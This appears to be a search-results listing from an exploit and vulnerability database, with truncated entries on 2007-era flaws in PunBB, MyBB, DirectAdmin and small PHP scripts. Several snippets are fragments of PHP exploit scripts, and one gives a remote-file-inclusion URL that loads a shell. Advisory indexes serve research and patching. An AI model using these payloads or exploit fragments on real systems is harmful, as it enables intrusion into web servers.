1408 matches found
PunBB 1.2.14 - Remote Code Execution
PunBB 1.2.14 - Remote Code Execution !/usr/bin/php URL: http://www.acid-root.new.fr/ ----------------------------------------------------------------------- Usage: $argv0 -url -usr -pwd Options Params: -url For example http://victim.com/punBB/ -usr User account 1 post at least -pwd Password accou...
CVE-2007-1926
Cross-site scripting XSS vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via 1 http or 2 ftp requests logged in /var/log/directadmin/security.log; 3 allows context-dependent...
Cross site scripting
Cross-site scripting XSS vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via 1 http or 2 ftp requests logged in /var/log/directadmin/security.log; 3 allows context-dependent...
PT-2007-3271
Name of the Vulnerable Software and Affected Versions DirectAdmin versions prior to 1.293 Description The issue allows remote authenticated users to inject arbitrary web script or HTML via http or ftp requests logged in various log files, including /var/log/directadmin/security.log. It also enabl...
HIOX GUEST BOOK (HGB) 4.0 - Remote Code Execution
+========================I=R=A=N============================+ HGB Version 4.0 =========================I=R=A=N============================= +========================I=R=A=N============================+ Author : Dj7xpl / Dj7xplatYahoodotcom...
MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit
No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; http://www.milw0rm.com/exploits/2012 They corrected not all a lot of SQL requests which use the ipaddress, with $db-escapestring. They don't corrected the function this is a choice ... the bad and they forgot to...
MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution
!/usr/bin/php escapestring. They don't corrected the function this is a choice ... the bad and they forgot to correct 1 only SQL request. They must correct the problem at the source = if$argc URL: http://www.acid-root.new.fr/ -----------------------------------------------------------------------...
BT-sondage 1.12 (gestion_sondage.php) RFI Vulnerability
No description provided by source. -------------------------------------------------------------------------------- Title : BT-Sondage-v112 Remote File Include Vulnerability -------------------------------------------------------------------------------- Author: CrackersChild cont@ct:...
Free Image Hosting <= 2.0 (AD_BODY_TEMP) Remote File Inclusion Vulns
No description provided by source. Baslik :ImageUpload Script Remote File Inclusion Exploit Free Image Hosting 2.0 .ndir : http://free-php-scripts.net/scripts/ImageUpload.zip Bulan :CrackersChild Zay.flk : tddiv align="center"?php include$ADBODYTEMP;?/div/td Exploit :...
W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities
W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities source: https://www.securityfocus.com/bid/23055/info w-Agora is prone to multiple arbitrary file-upload vulnerabilities. An attacker can exploit these vulnerabilities to upload PHP script code and execute it in the context of the...
npds-exec.txt
!/usr/bin/php Options OPTIONS | -proxy If you wanna use a proxy | -proxyauth Basic authentification ";exit1; $url = getparam'url',1; $pro = getparam'proxy'; $pra = getparam'proyauth'; $xpl = new phpsploit; $xpl-agent'Mozilla Firefox'; if$pro $xpl-proxy$pro; if$pra $xpl-proxyauth$pra; +print.php S...
Katalog Plyt Audio (pl) 1.0 - SQL Injection
126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex = '\b\d1,3.\d1,3.\d1,3.\d1,3:\d1,5\b'; function...
CVE-2007-1141
PHP remote file inclusion vulnerability in preview.php in Magic News Plus 1.0.2 allows remote attackers to execute arbitrary PHP code via a URL in the phpscriptpath parameter. NOTE: This issue may overlap CVE-2006-0723...
SQLiteManager SQLiteManager_currentTheme Cookie Traversal Local File Inclusion
The remote host is running SQLiteManager, a web-based application for managing SQLite databases. The version of SQLiteManager installed on the remote host fails to sanitize user input to the 'SQLiteManagercurrentTheme' cookie before using it to include PHP code in 'include/config.inc.php'. An...
fcring-rfi.txt
FCRing 1.3 Webringskript Found by kezzap66345 Script: http://www.scripter.ch/start.php?id=41.18.9&pos=fcring&title=FCRing%201.3 ERROR: if$sfuss != "" include$sfuss; rfi coded RFI: http://SITE.com/path/fcring.php?sfuss=SHELL kezzap66345athotmaildotcom thanx=x0r0nstr0keshika...
eXtreme File Hosting - Arbitrary .RAR File Upload
eXtreme File Hosting - Arbitrary .RAR File Upload source: https://www.securityfocus.com/bid/22498/info eXtreme File Hosting is prone to an arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue could allow an attacker to upload and...
eXtreme File Hosting - Arbitrary '.RAR' File Upload
source: https://www.securityfocus.com/bid/22498/info eXtreme File Hosting is prone to an arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue could allow an attacker to upload and execute arbitrary PHP script code in the context ...
CVE-2007-0808
PHP remote file inclusion vulnerability in Mina Ajans Script allows remote attackers to execute arbitrary PHP code via a URL in the syf parameter to an unspecified PHP script...
Michelle's L2J Dropcalc
============================================================================================== Title: Michelle's L2J Dropcalc Version: = v4 Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm Discovered By: Codebreak [email protected] | www.codebreak.tk...
Michelles L2J Dropcalc 4 - SQL Injection
Michelles L2J Dropcalc 4 - SQL Injection ============================================================================================== Title: Michelle's L2J Dropcalc Version: = v4 Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm Discovered By: Codebreak [email protected] ...